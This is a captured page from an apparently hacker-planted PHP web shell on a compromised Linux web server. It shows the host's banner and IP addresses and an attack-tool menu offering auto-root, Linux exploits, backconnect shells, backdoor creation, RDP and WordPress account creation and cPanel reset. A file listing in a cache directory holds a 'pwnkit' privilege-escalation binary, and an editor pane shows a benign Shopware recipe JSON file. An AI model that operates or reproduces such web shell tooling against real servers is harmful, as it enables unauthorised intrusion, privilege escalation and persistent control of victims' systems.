Linux node5458.myfcloud.com 6.10.2-x86_64-linode165 #1 SMP PREEMPT_DYNAMIC Tue Jul 30 15:03:21 EDT 2024 x86_64
Apache
: 45.79.123.194 | : 3.16.51.188
16 Domain
7.4.33
addify5
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
tmp /
composer /
cache /
repo /
flex /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
shopware-recipes-flex-main-doc...
1.11
KB
-rw-r--r--
shopware-recipes-flex-main-enq...
1.1
KB
-rw-r--r--
shopware-recipes-flex-main-enq...
1.14
KB
-rw-r--r--
shopware-recipes-flex-main-enq...
1.11
KB
-rw-r--r--
shopware-recipes-flex-main-ind...
3.27
KB
-rw-r--r--
shopware-recipes-flex-main-sho...
6.83
KB
-rw-r--r--
shopware-recipes-flex-main-sho...
24.73
KB
-rw-r--r--
shopware-recipes-flex-main-sho...
1.95
KB
-rw-r--r--
shopware-recipes-flex-main-sho...
5.46
KB
-rw-r--r--
shopware-recipes-flex-main-sro...
1.18
KB
-rw-r--r--
shopware-recipes-flex-main-sym...
1.1
KB
-rw-r--r--
shopware-recipes-flex-main-sym...
2.09
KB
-rw-r--r--
shopware-recipes-flex-main-sym...
2.93
KB
-rw-r--r--
shopware-recipes-flex-main-sym...
3.17
KB
-rw-r--r--
shopware-recipes-flex-main-sym...
3.45
KB
-rw-r--r--
shopware-recipes-flex-main-sym...
1.1
KB
-rw-r--r--
shopware-recipes-flex-main-sym...
1.11
KB
-rw-r--r--
shopware-recipes-flex-main-sym...
1.15
KB
-rw-r--r--
symfony-recipes-contrib-flex-m...
25
KB
-rw-r--r--
symfony-recipes-flex-main-inde...
46.37
KB
-rw-r--r--
symfony-recipes-flex-main-nyho...
1.9
KB
-rw-r--r--
symfony-recipes-flex-main-sens...
1.38
KB
-rw-r--r--
symfony-recipes-flex-main-symf...
1.58
KB
-rw-r--r--
symfony-recipes-flex-main-symf...
2.01
KB
-rw-r--r--
symfony-recipes-flex-main-symf...
1.36
KB
-rw-r--r--
symfony-recipes-flex-main-symf...
2.27
KB
-rw-r--r--
symfony-recipes-flex-main-symf...
1.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : shopware-recipes-flex-main-shopware.core.6.4.json
{"body":{"manifests":{"shopware\/core":{"manifest":{"copy-from-recipe":{"bin\/":"%BIN_DIR%\/","config\/":"%CONFIG_DIR%\/","custom\/":"custom\/","files\/":"files\/","public\/":"%PUBLIC_DIR%\/","var\/":"var\/","src\/":"src\/","root\/":""},"bundles":{"Shopware\\Core\\Framework\\Framework":["all"],"Shopware\\Core\\System\\System":["all"],"Shopware\\Core\\Content\\Content":["all"],"Shopware\\Core\\Checkout\\Checkout":["all"],"Shopware\\Core\\Maintenance\\Maintenance":["all"],"Shopware\\Core\\DevOps\\DevOps":["e2e"],"Shopware\\Core\\Profiling\\Profiling":["all"]},"container":{"shopware.store.frw":true,"default_cdn_strategy":"physical_filename","shopware.cdn.strategy":"%env(default:default_cdn_strategy:SHOPWARE_CDN_STRATEGY_DEFAULT)%"},"env":{"APP_ENV":"prod","APP_URL":"http:\/\/127.0.0.1:8000","APP_SECRET":"%generate(secret)%","INSTANCE_ID":"%generate(secret)%","BLUE_GREEN_DEPLOYMENT":"0","DATABASE_URL":"mysql:\/\/root:root@localhost\/shopware","#1":"With Shopware 6.4.17.0 the MAILER_DSN variable will be used in this template instead of MAILER_URL","MAILER_URL":"null:\/\/null"},"gitignore":[".env.local",".env.local.php",".env.*.local","custom\/*","!custom\/plugins\/.gitkeep","!custom\/static-plugins\/","\/public\/fonts\/*","!\/public\/fonts\/.gitkeep","\/public\/img\/*","!\/public\/img\/.gitkeep","\/public\/css\/*","!\/public\/css\/.gitkeep","\/public\/js\/*","!\/public\/js\/.gitkeep","\/public\/media\/*","!\/public\/media\/.gitkeep","\/public\/theme\/*","!\/public\/theme\/.gitkeep","\/public\/thumbnail\/*","!\/public\/thumbnail\/.gitkeep","\/public\/assets\/*","\/public\/sitemap\/*","!\/public\/sitemap\/.gitkeep","\/public\/bundles\/*","!\/public\/bundles\/.gitkeep","\/files\/*","\/var\/*","!\/var\/log\/.gitkeep","!\/var\/cache\/.gitkeep","\/auth.json","\/install.lock","public\/asset-manifest.json","files\/asset-manifest.json"],"composer-scripts":{"assets:install":"symfony-cmd"},"docker-compose":{"docker-compose.yml":{"services":["database:"," image: mysql:${MYSQL_VERSION:-8}-oracle"," environment:"," MYSQL_DATABASE: ${MYSQL_DATABASE:-shopware}"," # You should definitely change the password in production"," MYSQL_ROOT_PASSWORD: ${MYSQL_ROOT_PASSWORD:-!ChangeMe!}"," MYSQL_USER: ${MYSQL_USER:-shopware}"," MYSQL_PASSWORD: ${MYSQL_PASSWORD:-!ChangeMe!}"," volumes:"," - db-data:\/var\/lib\/mysql:rw"," # You may use a bind-mounted host directory instead, so that it is harder to accidentally remove the volume and lose all your data!"," # - .\/docker\/db\/data:\/var\/lib\/mysql:rw"],"volumes":["db-data:"]},"docker-compose.override.yml":{"services":["database:"," ports:"," - \"3306\""]}},"post-install-output":[" * <fg=blue>Setup<\/> your repository:",""," 1. Go to the project directory"," 2. Create your code repository with the <comment>git init<\/comment> command and push it to your favourite Git service",""," * <fg=blue>Run<\/> locally Shopware:",""," 1. Adjust the <comment>.env<\/comment> file to your database"," 2. Run <comment>.\/bin\/console system:install --basic-setup<\/comment>"," 3. Optional: If you use Symfony CLI start the webserver <comment>symfony server:start -d<\/comment>"," 3. The default credentials for administration are <comment>admin<\/comment> with password <comment>shopware<\/comment>",""," * <fg=blue>Run<\/> with Docker Shopware with Symfony CLI:",""," 1. Start the docker containers with <comment>docker compose up -d<\/comment>"," 2. Run <comment>symfony console system:install --basic-setup<\/comment>"," 3. Start the webserver <comment>symfony server:start -d<\/comment>"," 4. The default credentials for administration are <comment>admin<\/comment> with password <comment>shopware<\/comment>"," 5. Optional: Open the Mail catcher with <comment>symfony open:local:webmail<\/comment>",""," * <fg=blue>Read<\/> the documentation at <comment>https:\/\/developer.shopware.com\/<\/>"]},"files":{"bin\/.htaccess":{"contents":["<Files ~ \".*\">"," # Deny all requests from Apache 2.4+."," <IfModule mod_authz_core.c>"," Require all denied"," <\/IfModule>",""," # Deny all requests from Apache 2.0-2.2."," <IfModule !mod_authz_core.c>"," Deny from all"," <\/IfModule>","<\/Files>",""],"executable":false},"bin\/build-js.sh":{"contents":["#!\/usr\/bin\/env bash","","BIN_DIR=\"$(cd -P -- \"$(dirname -- \"${BASH_SOURCE[0]}\")\" && pwd -P)\"","","set -euo pipefail","","","if [[ -e \"${BIN_DIR}\/build-administration.sh\" ]]; then"," \"${BIN_DIR}\/build-administration.sh\"","fi","","if [[ -e \"${BIN_DIR}\/build-storefront.sh\" ]]; then"," \"${BIN_DIR}\/build-storefront.sh\"","fi"],"executable":true},"bin\/ci":{"contents":["#!\/usr\/bin\/env php","<?php","","use Shopware\\Core\\Framework\\Plugin\\KernelPluginLoader\\ComposerPluginLoader;","use Shopware\\Core\\HttpKernel;","use Symfony\\Bundle\\FrameworkBundle\\Console\\Application;","use Symfony\\Component\\Console\\Input\\ArgvInput;","","if (!file_exists(__DIR__ . '\/..\/.env') && !file_exists(__DIR__ . '\/..\/.env.dist') && !file_exists(__DIR__ . '\/..\/.env.local.php')) {"," $_SERVER['APP_RUNTIME_OPTIONS']['disable_dotenv'] = true;","}","","require_once __DIR__ . '\/..\/vendor\/autoload_runtime.php';","","return static function (array &$context) {"," set_time_limit(0);",""," $classLoader = require __DIR__ . '\/..\/vendor\/autoload.php';",""," if (!class_exists(Application::class)) {"," throw new RuntimeException('You need to add \"symfony\/framework-bundle\" as a Composer dependency.');"," }",""," if (!isset($context['PROJECT_ROOT'])) {"," $context['PROJECT_ROOT'] = dirname(__DIR__);"," }",""," $input = new ArgvInput();"," $env = $input->getParameterOption(['--env', '-e'], $context['APP_ENV'] ?? 'prod', true);"," $debug = ($context['APP_DEBUG'] ?? ($env !== 'prod')) && !$input->hasParameterOption('--no-debug', true);",""," $pluginLoader = new ComposerPluginLoader($classLoader, null);",""," if ($input->getFirstArgument() === 'system:install') {"," $context['INSTALL'] = true;"," }",""," if (trim($context['DATABASE_URL'] ?? '') === '') {"," \/\/ fake DATABASE_URL"," $_SERVER['DATABASE_URL'] = 'mysql:\/\/_placeholder.test';"," }",""," $kernel = new HttpKernel($env, $debug, $classLoader);"," $kernel->setPluginLoader($pluginLoader);",""," $application = new Application($kernel->getKernel());"," $kernel->getKernel()->boot();",""," $application->setName('Shopware');"," $application->setVersion($kernel->getKernel()->getContainer()->getParameter('kernel.shopware_version'));",""," return $application;","};",""],"executable":true},"bin\/console":{"contents":["#!\/usr\/bin\/env php","<?php","","use Shopware\\Core\\Framework\\Plugin\\KernelPluginLoader\\DbalKernelPluginLoader;","use Shopware\\Core\\Framework\\Plugin\\KernelPluginLoader\\StaticKernelPluginLoader;","use Shopware\\Core\\HttpKernel;","use Shopware\\Core\\Kernel;","use Symfony\\Bundle\\FrameworkBundle\\Console\\Application;","use Symfony\\Component\\Console\\Input\\ArgvInput;","","if (!file_exists(__DIR__ . '\/..\/.env') && !file_exists(__DIR__ . '\/..\/.env.dist') && !file_exists(__DIR__ . '\/..\/.env.local.php')) {"," $_SERVER['APP_RUNTIME_OPTIONS']['disable_dotenv'] = true;","}","","require_once __DIR__ . '\/..\/vendor\/autoload_runtime.php';","","return static function (array &$context) {"," set_time_limit(0);",""," $classLoader = require __DIR__ . '\/..\/vendor\/autoload.php';",""," if (!class_exists(Application::class)) {"," throw new RuntimeException('You need to add \"symfony\/framework-bundle\" as a Composer dependency.');"," }",""," if (!isset($context['PROJECT_ROOT'])) {"," $context['PROJECT_ROOT'] = dirname(__DIR__);"," }",""," $input = new ArgvInput();"," $env = $input->getParameterOption(['--env', '-e'], $context['APP_ENV'] ?? 'prod', true);"," $debug = ($context['APP_DEBUG'] ?? ($env !== 'prod')) && !$input->hasParameterOption('--no-debug', true);",""," $pluginLoader = new StaticKernelPluginLoader($classLoader, null);",""," if ($input->getFirstArgument() === 'system:install') {"," $context['INSTALL'] = true;"," }",""," if (trim($context['DATABASE_URL'] ?? '') === '') {"," \/\/ fake DATABASE_URL"," $_SERVER['DATABASE_URL'] = 'mysql:\/\/_placeholder.test';"," } else if (!isset($context['INSTALL'])) {"," $pluginLoader = new DbalKernelPluginLoader($classLoader, null, \\Shopware\\Core\\Kernel::getConnection());"," }",""," $kernel = new HttpKernel($env, $debug, $classLoader);"," $kernel->setPluginLoader($pluginLoader);",""," $application = new Application($kernel->getKernel());"," $kernel->getKernel()->boot();",""," $application->setName('Shopware');"," $application->setVersion($kernel->getKernel()->getContainer()->getParameter('kernel.shopware_version'));",""," return $application;","};",""],"executable":true},"bin\/functions.sh":{"contents":["#!\/usr\/bin\/env bash","","load_dotenv() {"," LOAD_DOTENV=${LOAD_DOTENV:-\"1\"}",""," if [[ \"$LOAD_DOTENV\" == \"0\" ]]; then"," return"," fi",""," CURRENT_ENV=${APP_ENV:-\"dev\"}"," env_file=\"$1\"",""," # If we have an actual .env file load it"," if [[ -e \"$env_file\" ]]; then"," # shellcheck source=\/dev\/null"," source \"$env_file\""," elif [[ -e \"$env_file.dist\" ]]; then"," # shellcheck source=\/dev\/null"," source \"$env_file.dist\""," fi",""," # If we have an local env file load it"," if [[ -e \"$env_file.local\" ]]; then"," # shellcheck source=\/dev\/null"," source \"$env_file.local\""," fi",""," # If we have an env file for the current env load it"," if [[ -e \"$env_file.$CURRENT_ENV\" ]]; then"," # shellcheck source=\/dev\/null"," source \"$env_file.$CURRENT_ENV\""," fi",""," # If we have an env file for the current env load it'"," if [[ -e \"$env_file.$CURRENT_ENV.local\" ]]; then"," # shellcheck source=\/dev\/null"," source \"$env_file.$CURRENT_ENV.local\""," fi","}",""],"executable":false},"config\/jwt\/.gitignore":{"contents":["*","","!.gitignore",""],"executable":false},"config\/packages\/shopware.yaml":{"contents":["# Using the webupdater will overwrite this file. Create a second file z-shopware.yaml to override the config","","shopware:"," auto_update:"," # Disables the auto updater in the UI","# enabled: false"," admin_worker:","# The Admin worker should be disabled on production server.","# enable_admin_worker: false",""],"executable":false},"custom\/.htaccess":{"contents":["<Files ~ \".*\">"," # Deny all requests from Apache 2.4+."," <IfModule mod_authz_core.c>"," Require all denied"," <\/IfModule>",""," # Deny all requests from Apache 2.0-2.2."," <IfModule !mod_authz_core.c>"," Deny from all"," <\/IfModule>","<\/Files>",""],"executable":false},"custom\/apps\/.gitignore":{"contents":[""],"executable":false},"custom\/plugins\/.gitignore":{"contents":[""],"executable":false},"custom\/static-plugins\/.gitignore":{"contents":[""],"executable":false},"files\/.htaccess":{"contents":["<Files ~ \".*\">"," # Deny all requests from Apache 2.4+."," <IfModule mod_authz_core.c>"," Require all denied"," <\/IfModule>",""," # Deny all requests from Apache 2.0-2.2."," <IfModule !mod_authz_core.c>"," Deny from all"," <\/IfModule>","<\/Files>",""],"executable":false},"public\/.htaccess.dist":{"contents":["# BEGIN Shopware","# The directives (lines) between \"# BEGIN Shopware\" and \"# END Shopware\" are dynamically generated. Any changes to the directives between these markers will be overwritten.","","DirectoryIndex index.php","","<IfModule mod_negotiation.c>"," Options -MultiViews","<\/IfModule>","","<IfModule mod_rewrite.c>"," RewriteEngine On",""," RewriteCond %{REQUEST_URI}::$1 ^(\/.+)\/(.*)::\\2$"," RewriteRule ^(.*) - [E=BASE:%1]",""," # Sets the HTTP_AUTHORIZATION header removed by Apache"," RewriteCond %{HTTP:Authorization} ."," RewriteRule ^ - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]",""," RewriteCond %{ENV:REDIRECT_STATUS} ^$"," RewriteRule ^index\\.php(?:\/(.*)|$) %{ENV:BASE}\/$1 [R=301,L]",""," # If the requested filename exists, simply serve it."," # We only want to let Apache serve files and not directories."," RewriteCond %{REQUEST_FILENAME} -f"," RewriteRule ^ - [L]",""," # Rewrite all other queries to the front controller."," RewriteRule ^ %{ENV:BASE}\/index.php [L]","<\/IfModule>","","<IfModule !mod_rewrite.c>"," <IfModule mod_alias.c>"," RedirectMatch 302 ^\/$ \/index.php\/"," <\/IfModule>","<\/IfModule>","","<IfModule mod_headers.c>"," <FilesMatch \"\\.(?i:svg)$\">"," Header set Content-Security-Policy \"script-src 'none'\""," <\/FilesMatch>","<\/IfModule>","","# END Shopware",""],"executable":false},"public\/index.php":{"contents":["<?php declare(strict_types=1);","","use Shopware\\Core\\DevOps\\Environment\\EnvironmentHelper;","use Shopware\\Core\\Framework\\Plugin\\KernelPluginLoader\\ComposerPluginLoader;","use Shopware\\Core\\HttpKernel;","use Shopware\\Core\\Installer\\InstallerKernel;","use Symfony\\Component\\HttpFoundation\\Request;","use Symfony\\Component\\HttpFoundation\\Response;","use Symfony\\Component\\HttpKernel\\HttpKernelInterface;","use Symfony\\Component\\HttpKernel\\TerminableInterface;","","$_SERVER['SCRIPT_FILENAME'] = __FILE__;","","require_once __DIR__ . '\/..\/vendor\/autoload_runtime.php';","","if (!file_exists(__DIR__ . '\/..\/.env') && !file_exists(__DIR__ . '\/..\/.env.dist') && !file_exists(__DIR__ . '\/..\/.env.local.php')) {"," $_SERVER['APP_RUNTIME_OPTIONS']['disable_dotenv'] = true;","}","","return function (array $context) {"," $classLoader = require __DIR__ . '\/..\/vendor\/autoload.php';",""," if (!EnvironmentHelper::getVariable('SHOPWARE_SKIP_WEBINSTALLER', false) && !file_exists(dirname(__DIR__) . '\/install.lock')) {"," $baseURL = str_replace(basename(__FILE__), '', $_SERVER['SCRIPT_NAME']);"," $baseURL = rtrim($baseURL, '\/');",""," if (strpos($_SERVER['REQUEST_URI'], '\/installer') === false) {"," header('Location: ' . $baseURL . '\/installer');"," exit;"," }"," }",""," $appEnv = $context['APP_ENV'] ?? 'dev';"," $debug = (bool) ($context['APP_DEBUG'] ?? ($appEnv !== 'prod'));",""," $trustedProxies = $context['TRUSTED_PROXIES'] ?? false;"," if ($trustedProxies) {"," Request::setTrustedProxies("," explode(',', $trustedProxies),"," Request::HEADER_X_FORWARDED_FOR | Request::HEADER_X_FORWARDED_PORT | Request::HEADER_X_FORWARDED_PROTO"," );"," }",""," $trustedHosts = $context['TRUSTED_HOSTS'] ?? false;"," if ($trustedHosts) {"," Request::setTrustedHosts(explode(',', $trustedHosts));"," }",""," if (!EnvironmentHelper::getVariable('SHOPWARE_SKIP_WEBINSTALLER', false) && !file_exists(dirname(__DIR__) . '\/install.lock')) {"," return new InstallerKernel($appEnv, $debug);"," }",""," $shopwareHttpKernel = new HttpKernel($appEnv, $debug, $classLoader);",""," if (EnvironmentHelper::getVariable('COMPOSER_PLUGIN_LOADER', false)) {"," $shopwareHttpKernel->setPluginLoader("," new ComposerPluginLoader($classLoader, null)"," );"," }",""," return new class($shopwareHttpKernel) implements HttpKernelInterface, TerminableInterface {"," private HttpKernel $httpKernel;",""," public function __construct(HttpKernel $httpKernel)"," {"," $this->httpKernel = $httpKernel;"," }",""," public function handle(Request $request, int $type = self::MAIN_REQUEST, bool $catch = true): Response"," {"," return $this->httpKernel->handle($request, $type, $catch)->getResponse();"," }",""," public function terminate(Request $request, Response $response): void"," {"," $this->httpKernel->terminate($request, $response);"," }"," };","};","",""],"executable":false},"public\/maintenance.html":{"contents":["<!DOCTYPE html>","<html>","<head>"," <meta http-equiv=\"Content-Type\" content=\"text\/html; charset=utf-8\" \/>"," <title>Wartungsmodus<\/title>",""," <style>"," article,aside,details,figcaption,figure,footer,header,hgroup,main,nav,section,summary{display:block}audio,canvas,video{display:inline-block}audio:not([controls]){display:none;height:0}[hidden]{display:none}html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}a:focus{outline:thin dotted}a:active,a:hover{outline:0}h1{font-size:2em;margin:.67em 0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}mark{background:#ff0;color:#000}code,kbd,pre,samp{font:1em monospace,serif}pre{white-space:pre-wrap}q{quotes:\"\\201C\" \"\\201D\" \"\\2018\" \"\\2019\"}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:0}fieldset{border:1px solid silver;margin:0 2px;padding:.35em .625em .75em}legend{border:0;padding:0}button,input,select,textarea{font-family:inherit;font-size:100%;margin:0}button,input{line-height:normal}button,select{text-transform:none}button,html input[type=\"button\"],input[type=\"reset\"],input[type=\"submit\"]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}input[type=\"checkbox\"],input[type=\"radio\"]{box-sizing:border-box;padding:0}input[type=\"search\"]{-webkit-appearance:textfield;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;box-sizing:content-box}input[type=\"search\"]::-webkit-search-cancel-button,input[type=\"search\"]::-webkit-search-decoration{-webkit-appearance:none}button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}textarea{overflow:auto;vertical-align:top}table{border-collapse:collapse;border-spacing:0}",""," body, html { min-height: 100%; background: #e9ebed; }"," .maintenance-container {"," position: relative;"," background: #fff;"," -webkit-border-radius: 3px;"," -moz-border-radius: 3px;"," border-radius: 3px;"," margin: 50px auto;"," width: 475px;"," padding: 30px;"," text-align: center;",""," -webkit-box-shadow: 0px 1px 3px rgba(0, 0, 0, .5);"," -moz-box-shadow: 0px 1px 3px rgba(0, 0, 0, .5);"," -ms-box-shadow: 0px 1px 3px rgba(0, 0, 0, .5);"," box-shadow: 0px 1px 3px rgba(0, 0, 0, .5);"," }"," .maintenance-headline {"," font-family: \"HelveticaNeue-Light\", \"Helvetica Neue Light\", \"Helvetica Neue\", Helvetica, Arial, \"Lucida Grande\", sans-serif;"," font-weight: 300;"," margin: 0 0 .8em;"," }"," .maintenance-text { font-size: 13px }"," .maintenance-progress {"," border-top: 1px solid #529e52;"," height: 4px; width: 100%;"," position: absolute;"," bottom: 0; left: 0;"," background-color: #5eb95e;"," -webkit-background-size: 40px 40px;"," -moz-background-size: 40px 40px;"," -o-background-size: 40px 40px;"," background-size: 40px 40px;"," -webkit-animation: progress-bar-stripes 2s linear infinite;"," -moz-animation: progress-bar-stripes 2s linear infinite;"," -ms-animation: progress-bar-stripes 2s linear infinite;"," -o-animation: progress-bar-stripes 2s linear infinite;"," animation: progress-bar-stripes 2s linear infinite;"," background-color: #62C462;"," background-image: -webkit-gradient(linear, 0 100%, 100% 0, color-stop(0.25, rgba(255, 255, 255, 0.15)), color-stop(0.25, rgba(0, 0, 0, 0)), color-stop(0.5, rgba(0, 0, 0, 0)), color-stop(0.5, rgba(255, 255, 255, 0.15)), color-stop(0.75, rgba(255, 255, 255, 0.15)), color-stop(0.75, rgba(0, 0, 0, 0)), to(rgba(0, 0, 0, 0)));"," background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, rgba(0, 0, 0, 0) 25%, rgba(0, 0, 0, 0) 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, rgba(0, 0, 0, 0) 75%, rgba(0, 0, 0, 0));"," background-image: -moz-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, rgba(0, 0, 0, 0) 25%, rgba(0, 0, 0, 0) 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, rgba(0, 0, 0, 0) 75%, rgba(0, 0, 0, 0));"," background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, rgba(0, 0, 0, 0) 25%, rgba(0, 0, 0, 0) 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, rgba(0, 0, 0, 0) 75%, rgba(0, 0, 0, 0));"," background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, rgba(0, 0, 0, 0) 25%, rgba(0, 0, 0, 0) 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, rgba(0, 0, 0, 0) 75%, rgba(0, 0, 0, 0));"," }",""," hr {"," background: transparent url(\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAECAYAAACtBE5DAAAAHUlEQVR42q3IoREAAACCQHdy\/91IFrLcfSGqc5wAdFYCZQo\/LFUAAAAASUVORK5CYII=\") repeat-x;"," border: 0 none;"," color: #CCC;"," height: 4px;"," padding: 0;"," margin: 30px 0;"," }","",""," @-webkit-keyframes progress-bar-stripes {"," from {"," background-position: 40px 0;"," }"," to {"," background-position: 0 0;"," }"," }",""," @-moz-keyframes progress-bar-stripes {"," from {"," background-position: 40px 0;"," }"," to {"," background-position: 0 0;"," }"," }",""," @-ms-keyframes progress-bar-stripes {"," from {"," background-position: 40px 0;"," }"," to {"," background-position: 0 0;"," }"," }",""," @-o-keyframes progress-bar-stripes {"," from {"," background-position: 0 0;"," }"," to {"," background-position: 40px 0;"," }"," }",""," @keyframes progress-bar-stripes {"," from {"," background-position: 40px 0;"," }"," to {"," background-position: 0 0;"," }"," }"," <\/style>","<\/head>","<body>","<div class=\"maintenance-container\">"," <h1 class=\"maintenance-headline\">Unsere Website befindet sich gerade in der Wartung.<\/h1>",""," <p class=\"maintenance-text\">"," Wir stehen Ihnen bald wieder zur Verf\u00fcgung. Entschuldigen Sie etwaige Unannehmlichkeiten."," <\/p>",""," <hr \/>",""," <h1 class=\"maintenance-headline\">Our website is currently undergoing maintenance.<\/h1>",""," <p class=\"maintenance-text\">"," We'll be back very soon. Sorry for any inconvenience."," <\/p>",""," <div class=\"maintenance-progress\"><\/div>","<\/div>","<\/body>","<\/html>",""],"executable":false},"root\/.htaccess":{"contents":["DirectoryIndex index.html index.php","","<IfModule mod_negotiation.c>"," Options -MultiViews","<\/IfModule>","","<IfModule mod_alias.c>"," # Restrict access to VCS directories"," RedirectMatch 404 \/\\\\.(svn|git|hg|bzr|cvs)(\/|$)",""," # Restrict access to root folder files"," RedirectMatch 404 \/(composer\\.(json|lock|phar)|README\\.md|\\.gitignore|.*\\.dist|\\.env.*)$","<\/IfModule>","",""],"executable":false},"var\/.htaccess":{"contents":["<Files ~ \".*\">"," # Deny all requests from Apache 2.4+."," <IfModule mod_authz_core.c>"," Require all denied"," <\/IfModule>",""," # Deny all requests from Apache 2.0-2.2."," <IfModule !mod_authz_core.c>"," Deny from all"," <\/IfModule>","<\/Files>",""],"executable":false}},"ref":"8e8963179f43502ca41d5f05dc6fe1a1dc292903"}}},"headers":{"content-length":["6879"],"source-age":["0"],"expires":["Thu, 18 Jan 2024 04:39:43 GMT"],"x-fastly-request-id":["61825b547a37e3265c90e14313a331f8506fca75"],"cross-origin-resource-policy":["cross-origin"],"access-control-allow-origin":["*"],"vary":["Authorization,Accept-Encoding,Origin"],"x-timer":["S1705552483.461695,VS0,VE268"],"x-cache-hits":["0"],"x-cache":["MISS"],"x-served-by":["cache-bom4726-BOM"],"via":["1.1 varnish"],"date":["Thu, 18 Jan 2024 04:34:43 GMT"],"accept-ranges":["bytes"],"content-encoding":["gzip"],"x-github-request-id":["DFAE:E7262:1C3F76:2A781F:65A8AA63"],"x-xss-protection":["1; mode=block"],"x-frame-options":["deny"],"x-content-type-options":["nosniff"],"strict-transport-security":["max-age=31536000"],"etag":["W\/\"85cdc4121a5029b2c5406e5f39e580817ca9cb637a08719075f5e8252ddd7543\""],"content-type":["text\/plain; charset=utf-8"],"content-security-policy":["default-src 'none'; style-src 'unsafe-inline'; sandbox"],"cache-control":["max-age=300"]}}
Close